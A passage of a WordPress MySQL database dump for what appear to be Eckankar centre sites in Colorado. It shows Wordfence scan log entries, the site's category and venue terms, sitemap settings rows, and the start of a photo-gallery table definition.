second'),(185280,1700415205.701537,2,'info','Scanned contents of 5929 additional files at 56.16 per second'),(185281,1700415206.725705,2,'info','Scanned contents of 5964 additional files at 55.95 per second'),(185282,1700415207.745906,2,'info','Scanned contents of 6012 additional files at 55.86 per second'),(185283,1700415208.753868,2,'info','Scanned contents of 6055 additional files at 55.74 per second'),(185284,1700415209.881014,2,'info','Scanned contents of 6067 additional files at 55.28 per second'),(185285,1700415210.929890,2,'info','Scanned contents of 6078 additional files at 54.85 per second'),(185286,1700415211.998153,2,'info','Scanned contents of 6088 additional files at 54.42 per second'),(185287,1700415212.998167,2,'info','Scanned contents of 6098 additional files at 54.03 per second'),(185288,1700415214.159777,2,'info','Scanned contents of 6107 additional files at 53.55 per second'),(185289,1700415215.172396,2,'info','Scanned contents of 6110 additional files at 53.11 per second'),(185290,1700415216.764436,2,'info','Scanned contents of 6113 additional files at 52.41 per second'),(185291,1700415217.782419,2,'info','Scanned contents of 6140 additional files at 52.19 per second'),(185292,1700415219.072115,2,'info','Scanned contents of 6176 additional files at 51.92 per second'),(185293,1700415220.125046,2,'info','Scanned contents of 6179 additional files at 51.49 per second'),(185294,1700415221.159645,2,'info','Scanned contents of 6241 additional files at 51.56 per second'),(185295,1700415222.506501,2,'info','Scanned contents of 6302 additional files at 51.49 per second'),(185296,1700415223.533327,2,'info','Scanned contents of 6345 additional files at 51.41 per second'),(185297,1700415224.556280,2,'info','Scanned contents of 6369 additional files at 51.19 per second'),(185298,1700415225.604274,2,'info','Scanned contents of 6409 additional files at 51.08 per second'),(185299,1700415226.624951,2,'info','Scanned contents of 6513 additional files at 51.49 per second'),(185300,1700415227.629736,2,'info','Scanned contents of 6559 additional files at 51.44 per second'),(185301,1700415228.634750,2,'info','Scanned contents of 6629 additional files at 51.58 per second'),(185302,1700415229.688214,2,'info','Scanned contents of 6649 additional files at 51.32 per second'),(185303,1700415230.708365,2,'info','Scanned contents of 6679 additional files at 51.15 per second'),(185304,1700415231.974695,2,'info','Scanned contents of 6734 additional files at 51.07 per second'),(185305,1700415232.998558,2,'info','Scanned contents of 6763 additional files at 50.90 per second'),(185306,1700415233.749735,2,'info','Scanned contents of 6775 additional files at 50.70 per second'),(185307,1700415233.749935,2,'info','Asking Wordfence to check URLs against malware list.'),(185308,1700415233.800549,2,'info','Checking 15583 host keys against Wordfence scanning servers.'),(185309,1700415234.008716,2,'info','Done host key check.'),(185310,1700415234.013060,2,'info','Done file contents scan'),(185311,1700415234.013852,10,'info','SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),(185312,1700415234.016179,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(185313,1700415234.019403,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(185314,1700415234.020615,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(185315,1700415234.023701,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(185316,1700415234.055598,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(185317,1700415234.056102,2,'info','Checking 70 host keys against Wordfence scanning servers.'),(185318,1700415234.173717,2,'info','Done host key check.'),(185319,1700415234.174027,2,'info','Done examining URLs'),(185320,1700415234.174616,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(185321,1700415234.177983,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(185322,1700415234.180975,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(185323,1700415234.184084,10,'info','SUM_START:Scanning for weak passwords'),(185324,1700415234.185348,2,'info','Starting password strength check on 3 users.'),(185325,1700415234.196985,10,'info','SUM_ENDOK:Scanning for weak passwords'),(185326,1700415234.200316,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(185327,1700415247.405514,3,'error','Unable to determine version for plugin folders'),(185328,1700415247.405786,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(185329,1700415247.409446,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(185330,1700415247.529093,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(185331,1700415247.532598,10,'info','SUM_START:Scanning for suspicious site options'),(185332,1700415247.539644,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(185333,1700415247.539925,2,'info','Done examining URLs'),(185334,1700415247.540432,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(185335,1700415247.542799,1,'info','-------------------'),(185336,1700415247.543047,2,'info','Wordfence used 32.23 MB of memory for scan. Server peak memory usage was: 64.23 MB'),(185337,1700415247.548052,1,'info','Scan Complete. Scanned 17632 files, 40 plugins, 2 themes, 58 posts, 0 comments and 19421 URLs in 2 minutes 49 seconds.'),(185338,1700415247.548252,10,'info','SUM_FINAL:Scan complete. You have 4 new issues to fix. See below.');
/*!40000 ALTER TABLE `wpcl_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfstatus` with 953 row(s)
--

--
-- Table structure for table `wpcl_terms`
--

DROP TABLE IF EXISTS `wpcl_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=206 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_terms`
--

LOCK TABLES `wpcl_terms` WRITE;
/*!40000 ALTER TABLE `wpcl_terms` DISABLE KEYS */;
INSERT INTO `wpcl_terms` VALUES (1,'Uncategorized','uncategorized',0),(7,'primary','primary',0),(8,'Social Media','social-media',0),(9,'testimonial','testimonial',0),(10,'call_to_action','call_to_action',0),(11,'services','services',0),(12,'Central Colorado Member Calendar','eck-central-colorado-chela-calendar',0),(13,'Central Colorado Calendar','eck-central-colorado-public-calendar',0),(14,'Colorado Springs Member Calendar','eck-colorado-springs-chela-calendar',0),(15,'Colorado Springs Calendar','eck-colorado-springs-public-calendar',0),(16,'Loveland Member Calendar','eck-loveland-chela-calendar',0),(17,'Loveland Calendar','eck-loveland-public-calendar',0),(19,'books','books',0),(20,'harold','harold',0),(21,'home page tabs','home-page-tabs',0),(22,'calendar images','calendar-images',0),(23,'boldgrid block images','boldgrid-block-images',0),(24,'pdfs','pdfs',0),(25,'tabs','tabs',0),(26,'2019 Worldwide','2019-worldwide',0),(27,'Test 1','test-1',0),(28,'books','books-1565885558',0),(29,'tabs','tabs-1565885579',0),(31,'eck-logo','eck-logo-1565886815',0),(32,'pdfs','pdfs-1565886867',0),(33,'harold','harold-1565886912',0),(34,'home-page','home-page-1565886961',0),(35,'audio','audio-1565887062',0),(36,'calendar','calendar-1565887117',0),(37,'activities','activities-1565888875',0),(39,'spiritual-exercises','spiritual-exercises-1565892574',0),(40,'members-page','members-page-1565893601',0),(41,'footer','footer-1565893626',0),(42,'co-springs','co-springs-1565922584',0),(43,'loveland','loveland-1565923611',0),(44,'temple','temple-1565923759',0),(45,'west-slope','west-slope-1565924642',0),(46,'about','about-1565924756',0),(48,'state-contact-list','state-contact-list-1565924870',0),(49,'initiators-esas','initiators-esas-1565924906',0),(50,'log-in','log-in-1565924988',0),(51,'resa-faq','resa-faq-1565925186',0),(52,'temple-gallery','temple-gallery-1565925695',0),(54,'404-page','404-page-1566009182',0),(55,'team','team',0),(56,'eck masters','eck-masters-1568058908',0),(57,'youth and family','youth-and-family-1568073880',0),(58,'temple-guests','temple-people-1569360204',0),(59,'privacy','privacy-1570731842',0),(60,'organization chart','organization-chart-1570830604',0),(61,'site icon','site-icon-1576174108',0),(62,'Password Protected --MEMBERS','password-protected-members',0),(63,'ECKCO Primary Menu','eckco-primary-menu',0),(66,'Appearance or Signing','appearance-or-signing',0),(67,'Attraction','attraction',0),(68,'Camp, Trip, or Retreat','camp-trip-or-retreat',0),(69,'Class, Training, or Workshop','class-training-or-workshop',0),(70,'Concert or Performance','concert-or-performance',0),(71,'Conference','conference',0),(72,'Convention','convention',0),(73,'Dinner or Gala','dinner-or-gala',0),(74,'Festival or Fair','festival-or-fair',0),(75,'Game or Competition','game-or-competition',0),(76,'Meeting or Networking Event','meeting-or-networking-event',0),(77,'Other','other',0),(78,'Party or Social Gathering','party-or-social-gathering',0),(79,'Race or Endurance Event','race-or-endurance-event',0),(80,'Rally','rally',0),(81,'Screening','screening',0),(82,'Seminar or Talk','seminar-or-talk',0),(83,'Tour','tour',0),(84,'Tournament','tournament',0),(85,'Tradeshow, Consumer Show or Expo','tradeshow-consumer-show-or-expo',0),(86,'Business &amp; Professional','business-professional',0),(87,'Charity &amp; Causes','charity-causes',0),(88,'Community &amp; Culture','community-culture',0),(89,'Family &amp; Education','family-education',0),(90,'Fashion &amp; Beauty','fashion-beauty',0),(91,'Film, Media &amp; Entertainment','film-media-entertainment',0),(92,'Food &amp; Drink','food-drink',0),(93,'Game or Competition','game-or-competition',0),(94,'Other','other',0),(95,'Performing &amp; Visual Arts','performing-visual-arts',0),(96,'Science &amp; Technology','science-technology',0),(97,'Sports &amp; Fitness','sports-fitness',0),(99,'Satsang Registration','2020-satsang-registration-1601414506',0),(101,'donation backgrounds','donation-backgrounds-1603753890',0),(102,'VIRTUAL EVENTS','virtual-events',0),(103,'virtual events - website','virtual-events-website-1607010971',0),(104,'meetup events','meetup-events-1607010985',0),(105,'email','email-1607010998',0),(106,'Mountain Areas Calendar','eck-mountain-areas-public-calendar',0),(107,'Mountain Areas Member Calendar','eck-mountain-areas-member-calendar',0),(108,'web form-success backgrounds','web-form-success-backgrounds-1613941175',0),(109,'form submission confirmation','form-submission-confirmation-1614118077',0),(110,'Central Colorado Public Calendar mec','central-colorado-public-calendar-mec',0),(111,'Central Colorado Member Calendar mec','central-colorado-member-calendar-mec',0),(112,'Colorado Springs Member Calendar mec','colorado-springs-member-calendar-mec',0),(113,'Colorado Springs Public Calendar mec','colorado-springs-public-calendar-mec',0),(114,'Loveland Public Calendar mec','loveland-public-calendar-mec',0),(115,'Loveland Member Calendar mec','loveland-member-calendar-mec',0),(116,'Mountain Area Public Calendar mec','mountain-area-public-calendar-mec',0),(117,'Mountain Area Member Calendar mec','mountain-area-member-calendar-mec',0),(118,'Online Event','online-event',0),(119,'Virtual Meetup Event','virtual-meetup-event',0),(120,'Virtual Zoom Event','virtual-zoom-event',0),(121,'Center for Inner Peace','center-for-inner-peace',0),(122,'ECK Temple of Colorado','eck-temple-of-colorado',0),(123,'Loveland ECK Center','loveland-eck-center',0),(124,'2021 MAY ESC Soul Adventure Event','2021-esc-soul-adventure-event-1617565583',0),(126,'hero images','hero-images-1617566100',0),(127,'facebook icons','facebook-icons-1620243684',0),(128,'elss-sos-promos','elss-sos-promos-1623943128',0),(129,'ECK Temple of Colorado | In-Person &amp; Online','eck-temple-of-colorado-in-person-online',0),(130,'2021 ESC October Event','2021-esc-october-event-1628801798-2',0),(131,'Pagosa Lakes Property Owners Association','pagosa-lakes-property-owners-association',0),(132,'Rocky Mountain Retreat Center','rocky-mountain-retreat-center',0),(133,'satsang-reg form bkgnds','satsang-reg-form-bkgnds-1632436077-2',0),(134,'Admin Dashboard Functions','admin-dashboard-functions',0),(135,'InMotion Hosting – Account Management Panel (AMP)','inmotion-hosting-account-management-panel-amp',0),(136,'Media Manager','media-manager',0),(137,'Modern Events Calendar Plugin','modern-events-calendar-plugin',0),(141,'In Person &amp; Online','in-person-online',0),(142,'podcast','podcast-1637007891-2',0),(143,'boldgrid-hydra','boldgrid-hydra',0),(144,'ECK Temple of Utah &amp; Online','eck-temple-of-utah-online',0),(145,'In Person','in-person',0),(146,'Edward Sell Smith Park - Boulder CO','edward-sell-smith-park',0),(147,'TownePlace Suites by Marriott','towneplace-suites-by-marriott',0),(149,'LaPlata County Fairgrounds, Main Exhibit Hall','laplata-county-fairgrounds-main-exhibit-hall',0),(150,'ESC eBooklets-Promo','esc-ebooklets-promo-1658351233-2',0),(152,'text','text',0),(153,'after_paragraph','after_paragraph',0),(154,'sample','sample',0),(155,'message','message',0),(156,'php','php',0),(157,'everywhere','everywhere',0),(158,'disable','disable',0),(159,'comments','comments',0),(160,'2022 ESC October Event','2022-esc-october-event-1660411015-2',0),(161,'Turtle Lake Refuge','turtle-lake-refuge',0),(162,'Minneapolis Convention Center','minneapolis-convention-center-1301-second-avenue-south-minneapolis-mn-55403',0),(163,'Pikes Peak Library District - East Library','pikes-peak-library-district-east-library',0),(164,'Pikes Peak Library District - Penrose Library','pikes-peak-library-district-penrose-library',0),(165,'Hilton Garden Inn Longmont','hilton-garden-inn-longmont',0),(166,'Loveland Public Library','loveland-public-library',0),(167,'Willow Glen Apartments','glen-willow',0),(168,'maintenance image','maintenance-image-1672428348-2',0),(169,'2023 HI Conference','2023-hi-conference-1673629591-2',0),(170,'Douglas County Libraries','douglascountylibraries',0),(171,'Pearl Street - Boulder','pearl-street-boulder',0),(173,'Email Whitelist','email-whitelist-1675285132-2',0),(174,'ESC Required Elements','esc-required-elements-1675447749-2',0),(175,'ESC Soul Adv Banner','esc-welcome-element-1675447783-2',0),(176,'ESC For You From Eckankar Element','esc-for-you-from-eckankar-element-1675457757-2',0),(177,'ESC ECK Soul Adv Guide Element','esc-eck-soul-adv-guide-element-1675458351-2',0),(178,'ESC Want To Go Deeper? Element','esc-want-to-go-deeperij-element-1675459483-2',0),(179,'2023 HI Conf PROMO','2023-hi-conf-promo-1676320006-2',0),(180,'favicon','favicon-1676431141-2',0),(181,'video and book-promo','video-and-book-promo-1677614099-2',0),(182,'Centennial Park','centennialpark',0),(183,'Four Winds Coffee &amp; Tea','four-winds-coffee-tea',0),(184,'The Ranch Event Complex','the-ranch-event-complex',0),(185,'Colorado Springs ECK Center','colorado-springs-eck-center',0),(186,'Colorado Springs Event Center','colorado-springs-event-center',0),(187,'Parker Public Library','parker-public-library',0),(189,'2023 Regional SA Seminar','2023-regional-sa-seminar-1686515015-2',0),(190,'Sound of Soul Event','sound-of-soul-event',0),(191,'ECK Light &amp; Sound Service','eck-light-sound-service',0),(192,'Spiritual Discussion','spiritual-discussion',0),(193,'Highlands Street Fair - Denver','highlands-street-fair-denver',0),(194,'Live Streaming Event','live-streaming-event',0),(197,'Soul Adventure Seminar','soul-adventure-seminar',0),(198,'Pike Peak Library District - Manitou Springs Library','manitouspringslibrary',0),(202,'Video Rebroadcast','video-rebroadcast-harold-klemp',0),(199,'proton mail','proton-mail-1693861764-2',0),(200,'Longmont Public Library','longmontpubliclibrary',0),(201,'Spiritual Fair Booth','spiritual-fair-booth',0),(203,'waves','waves-1698426607-2',0),(204,'Canceled','canceled',0),(205,'2023-2024-ESC Streaming Event','2023-2024-esc-streaming-event-1700246939-2',0);
/*!40000 ALTER TABLE `wpcl_terms` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_terms` with 181 row(s)
--

--
-- Table structure for table `wpcl_xsg_sitemap_meta`
--

DROP TABLE IF EXISTS `wpcl_xsg_sitemap_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_xsg_sitemap_meta` (
  `itemId` int(11) DEFAULT 0,
  `inherit` int(11) DEFAULT 0,
  `itemType` varchar(8) DEFAULT '',
  `exclude` int(11) DEFAULT 0,
  `priority` int(11) DEFAULT 0,
  `frequency` int(11) DEFAULT 0,
  `news` int(11) NOT NULL DEFAULT 0,
  UNIQUE KEY `idx_xsg_sitemap_meta_ItemId_ItemType` (`itemId`,`itemType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci COMMENT='generatated by XmlSitemapGenerator.org';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_xsg_sitemap_meta`
--

LOCK TABLES `wpcl_xsg_sitemap_meta` WRITE;
/*!40000 ALTER TABLE `wpcl_xsg_sitemap_meta` DISABLE KEYS */;
INSERT INTO `wpcl_xsg_sitemap_meta` VALUES (266311,0,'post',1,1,1,0),(266573,0,'post',1,1,1,0),(266566,0,'post',1,1,1,0),(266575,0,'post',1,1,1,0),(266576,0,'post',1,1,1,0),(266597,0,'post',1,1,1,0),(266540,0,'post',1,1,1,0),(266568,0,'post',1,1,1,0),(68102,0,'post',1,1,1,0),(262102,0,'post',1,1,1,0),(266604,0,'post',1,1,1,0),(266611,0,'post',1,1,1,0),(144,0,'taxonomy',1,1,1,0),(266543,0,'post',1,1,1,0),(264262,0,'post',1,1,1,0),(264415,0,'post',1,1,1,0),(264438,0,'post',1,1,1,0),(264431,0,'post',1,1,1,0),(266619,0,'post',1,1,1,0),(266625,0,'post',1,1,1,0),(266626,0,'post',1,1,1,0),(266633,0,'post',1,1,1,0),(266657,0,'post',1,1,1,0),(266676,0,'post',1,1,1,0),(79666,0,'post',1,1,1,0),(265565,0,'post',1,1,1,0),(265598,0,'post',1,1,1,0),(266688,0,'post',1,1,1,0),(266690,0,'post',1,1,1,0),(265024,0,'post',1,1,1,0),(264416,0,'post',1,1,1,0),(264430,0,'post',1,1,1,0),(264437,0,'post',1,1,1,0),(266702,0,'post',1,1,1,0),(266706,0,'post',1,1,1,0),(266704,0,'post',1,1,1,0),(266708,0,'post',1,1,1,0),(266713,0,'post',1,1,1,0),(266715,0,'post',1,1,1,0),(266719,0,'post',1,1,1,0),(266722,0,'post',1,1,1,0),(266725,0,'post',1,1,1,0),(266728,0,'post',1,1,1,0),(23,0,'author',1,1,1,0),(266732,0,'post',1,1,1,0),(266733,0,'post',1,1,1,0),(266735,0,'post',1,1,1,0),(266737,0,'post',1,1,1,0),(266738,0,'post',1,1,1,0),(266739,0,'post',1,1,1,0),(266742,0,'post',1,1,1,0),(266764,0,'post',1,1,1,0),(266545,0,'post',1,1,1,0),(266544,0,'post',1,1,1,0),(45842,0,'post',1,1,1,0),(266801,0,'post',1,1,1,0),(266815,0,'post',1,1,1,0),(266813,0,'post',1,1,1,0),(146,0,'taxonomy',1,1,1,0),(266820,0,'post',1,1,1,0),(266826,0,'post',1,1,1,0),(266827,0,'post',1,1,1,0),(266829,0,'post',1,1,1,0),(266831,0,'post',1,1,1,0),(266832,0,'post',1,1,1,0),(266838,0,'post',1,1,1,0),(266841,0,'post',1,1,1,0),(266844,0,'post',1,1,1,0),(266849,0,'post',1,1,1,0),(266871,0,'post',1,1,1,0),(147,0,'taxonomy',1,1,1,0),(266875,0,'post',1,1,1,0),(266883,0,'post',1,1,1,0),(149,0,'taxonomy',1,1,1,0),(266888,0,'post',1,1,1,0),(264325,0,'post',1,1,1,0),(266905,0,'post',1,1,1,0),(266942,0,'post',1,1,1,0),(266950,0,'post',1,1,1,0),(7160,0,'post',1,1,1,0),(266983,0,'post',1,1,1,0),(266988,0,'post',1,1,1,0),(266990,0,'post',1,1,1,0),(266994,0,'post',1,1,1,0),(266996,0,'post',1,1,1,0),(266998,0,'post',1,1,1,0),(266532,0,'post',1,1,1,0),(181536,0,'post',1,1,1,0),(267012,0,'post',1,1,1,0),(267037,0,'post',1,1,1,0),(267041,0,'post',1,1,1,0),(267043,0,'post',1,1,1,0),(267044,0,'post',1,1,1,0),(267092,0,'post',1,1,1,0),(267101,0,'post',1,1,1,0),(267102,0,'post',1,1,1,0),(267103,0,'post',1,1,1,0),(267105,0,'post',1,1,1,0),(267106,0,'post',1,1,1,0),(267108,0,'post',1,1,1,0),(33553,0,'post',1,1,1,0),(267155,0,'post',1,1,1,0),(267185,0,'post',1,1,1,0),(267186,0,'post',1,1,1,0),(267207,0,'post',1,1,1,0),(267211,0,'post',1,1,1,0),(267219,0,'post',1,1,1,0),(266522,0,'post',1,1,1,0),(267222,0,'post',1,1,1,0),(267230,0,'post',1,1,1,0),(267231,0,'post',1,1,1,0),(162,0,'taxonomy',1,1,1,0),(267237,0,'post',1,1,1,0),(267246,0,'post',1,1,1,0),(267252,0,'post',1,1,1,0),(267268,0,'post',1,1,1,0),(267309,0,'post',1,1,1,0),(267334,0,'post',1,1,1,0),(267338,0,'post',1,1,1,0),(267341,0,'post',1,1,1,0),(267345,0,'post',1,1,1,0),(267346,0,'post',1,1,1,0),(267353,0,'post',1,1,1,0),(267408,0,'post',1,1,1,0),(267433,0,'post',1,1,1,0),(163,0,'taxonomy',1,1,1,0),(267447,0,'post',1,1,1,0),(265240,0,'post',1,1,1,0),(164,0,'taxonomy',1,1,1,0),(267449,0,'post',1,1,1,0),(267453,0,'post',1,1,1,0),(267478,0,'post',1,1,1,0),(267511,0,'post',1,1,1,0),(267513,0,'post',1,1,1,0),(267514,0,'post',1,1,1,0),(267515,0,'post',1,1,1,0),(267539,0,'post',1,1,1,0),(267554,0,'post',1,1,1,0),(267568,0,'post',1,1,1,0),(267570,0,'post',1,1,1,0),(267571,0,'post',1,1,1,0),(267573,0,'post',1,1,1,0),(267576,0,'post',1,1,1,0),(267577,0,'post',1,1,1,0),(267579,0,'post',1,1,1,0),(267609,0,'post',1,1,1,0),(267613,0,'post',1,1,1,0),(267617,0,'post',1,1,1,0),(267619,0,'post',1,1,1,0),(267620,0,'post',1,1,1,0),(267624,0,'post',1,1,1,0),(267626,0,'post',1,1,1,0),(267639,0,'post',1,1,1,0),(267647,0,'post',1,1,1,0),(267653,0,'post',1,1,1,0),(267665,0,'post',1,1,1,0),(167,0,'taxonomy',1,1,1,0),(267692,0,'post',1,1,1,0),(267694,0,'post',1,1,1,0),(170,0,'taxonomy',1,1,1,0),(267697,0,'post',1,1,1,0),(267698,0,'post',1,1,1,0),(267700,0,'post',1,1,1,0),(267701,0,'post',1,1,1,0),(264610,0,'post',1,1,1,0),(266104,0,'post',1,1,1,0),(266316,0,'post',1,1,1,0),(266168,0,'post',1,1,1,0),(267730,0,'post',1,1,1,0),(171,0,'taxonomy',1,1,1,0),(267733,0,'post',1,1,1,0),(267755,0,'post',1,1,1,0),(267766,0,'post',1,1,1,0),(267776,0,'post',1,1,1,0),(267807,0,'post',1,1,1,0),(267809,0,'post',1,1,1,0),(267812,0,'post',1,1,1,0),(267813,0,'post',1,1,1,0),(267824,0,'post',1,1,1,0),(267872,0,'post',1,1,1,0),(267895,0,'post',1,1,1,0),(266318,0,'post',1,1,1,0),(267914,0,'post',1,1,1,0),(267918,0,'post',1,1,1,0),(267919,0,'post',1,1,1,0),(268025,0,'post',1,1,1,0),(268027,0,'post',1,1,1,0),(268029,0,'post',1,1,1,0),(268031,0,'post',1,1,1,0),(268038,0,'post',1,1,1,0),(268116,0,'post',1,1,1,0),(268129,0,'post',1,1,1,0),(268131,0,'post',1,1,1,0),(268150,0,'post',1,1,1,0),(268157,0,'post',1,1,1,0),(268159,0,'post',1,1,1,0),(268161,0,'post',1,1,1,0),(268171,0,'post',1,1,1,0),(268177,0,'post',1,1,1,0),(268178,0,'post',1,1,1,0),(268179,0,'post',1,1,1,0),(268181,0,'post',1,1,1,0),(268193,0,'post',1,1,1,0),(268195,0,'post',1,1,1,0),(268197,0,'post',1,1,1,0),(182,0,'taxonomy',1,1,1,0),(268208,0,'post',1,1,1,0),(268210,0,'post',1,1,1,0),(268213,0,'post',1,1,1,0),(268215,0,'post',1,1,1,0),(268216,0,'post',1,1,1,0),(267696,0,'post',1,1,1,0),(268225,0,'post',1,1,1,0),(183,0,'taxonomy',1,1,1,0),(268243,0,'post',1,1,1,0),(184,0,'taxonomy',1,1,1,0),(268244,0,'post',1,1,1,0),(268246,0,'post',1,1,1,0),(268248,0,'post',1,1,1,0),(268249,0,'post',1,1,1,0),(268251,0,'post',1,1,1,0),(185,0,'taxonomy',1,1,1,0),(268252,0,'post',1,1,1,0),(268255,0,'post',1,1,1,0),(268258,0,'post',1,1,1,0),(186,0,'taxonomy',1,1,1,0),(268262,0,'post',1,1,1,0),(268264,0,'post',1,1,1,0),(268265,0,'post',1,1,1,0),(268279,0,'post',1,1,1,0),(266467,0,'post',1,1,1,0),(268282,0,'post',1,1,1,0),(268298,0,'post',1,1,1,0),(31882,0,'post',1,1,1,0),(268349,0,'post',1,1,1,0),(261866,0,'post',1,1,1,0),(268399,0,'post',1,1,1,0),(268406,0,'post',1,1,1,0),(268409,0,'post',1,1,1,0),(268410,0,'post',1,1,1,0),(268411,0,'post',1,1,1,0),(268413,0,'post',1,1,1,0),(268417,0,'post',1,1,1,0),(268419,0,'post',1,1,1,0),(187,0,'taxonomy',1,1,1,0),(268420,0,'post',1,1,1,0),(268422,0,'post',1,1,1,0),(268423,0,'post',1,1,1,0),(268425,0,'post',1,1,1,0),(268426,0,'post',1,1,1,0),(268427,0,'post',1,1,1,0),(268430,0,'post',1,1,1,0),(268440,0,'post',1,1,1,0),(268447,0,'post',1,1,1,0),(268450,0,'post',1,1,1,0),(268452,0,'post',1,1,1,0),(268461,0,'post',1,1,1,0),(268477,0,'post',1,1,1,0),(268479,0,'post',1,1,1,0),(268481,0,'post',1,1,1,0),(268482,0,'post',1,1,1,0),(268484,0,'post',1,1,1,0),(268530,0,'post',1,1,1,0),(268531,0,'post',1,1,1,0),(268565,0,'post',1,1,1,0),(268567,0,'post',1,1,1,0),(268568,0,'post',1,1,1,0),(188,0,'taxonomy',1,1,1,0),(268593,0,'post',1,1,1,0),(268595,0,'post',1,1,1,0),(268250,0,'post',1,1,1,0),(265436,0,'post',1,1,1,0),(268607,0,'post',1,1,1,0),(190,0,'taxonomy',1,1,1,0),(191,0,'taxonomy',1,1,1,0),(192,0,'taxonomy',1,1,1,0),(268633,0,'post',1,1,1,0),(268638,0,'post',1,1,1,0),(268639,0,'post',1,1,1,0),(193,0,'taxonomy',1,1,1,0),(268623,0,'post',1,1,1,0),(268661,0,'post',1,1,1,0),(268667,0,'post',1,1,1,0),(268666,0,'post',1,1,1,0),(194,0,'taxonomy',1,1,1,0),(268678,0,'post',1,1,1,0),(268679,0,'post',1,1,1,0),(265425,0,'post',1,1,1,0),(268685,0,'post',1,1,1,0),(195,0,'taxonomy',1,1,1,0),(196,0,'taxonomy',1,1,1,0),(268726,0,'post',1,1,1,0),(268730,0,'post',1,1,1,0),(268736,0,'post',1,1,1,0),(197,0,'taxonomy',1,1,1,0),(268743,0,'post',1,1,1,0),(268745,0,'post',1,1,1,0),(268747,0,'post',1,1,1,0),(268751,0,'post',1,1,1,0),(268752,0,'post',1,1,1,0),(268753,0,'post',1,1,1,0),(268759,0,'post',1,1,1,0),(268762,0,'post',1,1,1,0),(268765,0,'post',1,1,1,0),(268770,0,'post',1,1,1,0),(268794,0,'post',1,1,1,0),(268797,0,'post',1,1,1,0),(268811,0,'post',1,1,1,0),(268835,0,'post',1,1,1,0),(198,0,'taxonomy',1,1,1,0),(268837,0,'post',1,1,1,0),(268838,0,'post',1,1,1,0),(268839,0,'post',1,1,1,0),(268843,0,'post',1,1,1,0),(268844,0,'post',1,1,1,0),(268846,0,'post',1,1,1,0),(268848,0,'post',1,1,1,0),(268856,0,'post',1,1,1,0),(268859,0,'post',1,1,1,0),(268860,0,'post',1,1,1,0),(268863,0,'post',1,1,1,0),(268871,0,'post',1,1,1,0),(268874,0,'post',1,1,1,0),(268876,0,'post',1,1,1,0),(268880,0,'post',1,1,1,0),(121,0,'taxonomy',1,1,1,0),(131,0,'taxonomy',1,1,1,0),(268902,0,'post',1,1,1,0),(268905,0,'post',1,1,1,0),(268904,0,'post',1,1,1,0),(268912,0,'post',1,1,1,0),(268914,0,'post',1,1,1,0),(268933,0,'post',1,1,1,0),(268934,0,'post',1,1,1,0),(268940,0,'post',1,1,1,0),(268847,0,'post',1,1,1,0),(265919,0,'post',1,1,1,0),(268947,0,'post',1,1,1,0),(268950,0,'post',1,1,1,0),(268953,0,'post',1,1,1,0),(261549,0,'post',1,1,1,0),(268958,0,'post',1,1,1,0),(268962,0,'post',1,1,1,0),(268963,0,'post',1,1,1,0),(268965,0,'post',1,1,1,0),(268972,0,'post',1,1,1,0),(268974,0,'post',1,1,1,0),(268983,0,'post',1,1,1,0),(269010,0,'post',1,1,1,0),(269018,0,'post',1,1,1,0),(25,0,'author',1,1,1,0),(269107,0,'post',1,1,1,0),(269109,0,'post',1,1,1,0),(269111,0,'post',1,1,1,0),(269118,0,'post',1,1,1,0),(200,0,'taxonomy',1,1,1,0),(269121,0,'post',1,1,1,0),(269138,0,'post',1,1,1,0),(269140,0,'post',1,1,1,0),(201,0,'taxonomy',1,1,1,0),(269143,0,'post',1,1,1,0),(269144,0,'post',1,1,1,0),(269146,0,'post',1,1,1,0),(269147,0,'post',1,1,1,0),(269149,0,'post',1,1,1,0),(269160,0,'post',1,1,1,0),(269184,0,'post',1,1,1,0);
/*!40000 ALTER TABLE `wpcl_xsg_sitemap_meta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_xsg_sitemap_meta` with 367 row(s)
--

--
-- Table structure for table `wpcl_gg_photos`
--

DROP TABLE IF EXISTS `wpcl_gg_photos`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_gg_photos` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `folder_id` int(11) NOT NULL DEFAULT 0,
  `album_id` int(11) NOT NULL,
  `attachment_id` int(11) NOT NULL,
  `position` int(11) NOT NULL DEFAULT 9000,
  `timestamp` timestamp NOT NULL DEFAULT current_timestamp(),
  `link_type` tinyint(4) NOT NULL DEFAULT 0,
  `link_full` varchar(255) NOT NULL,
  `link_thumb` varchar(255) NOT NULL,
  `link_default` varchar(255) NOT NULL,
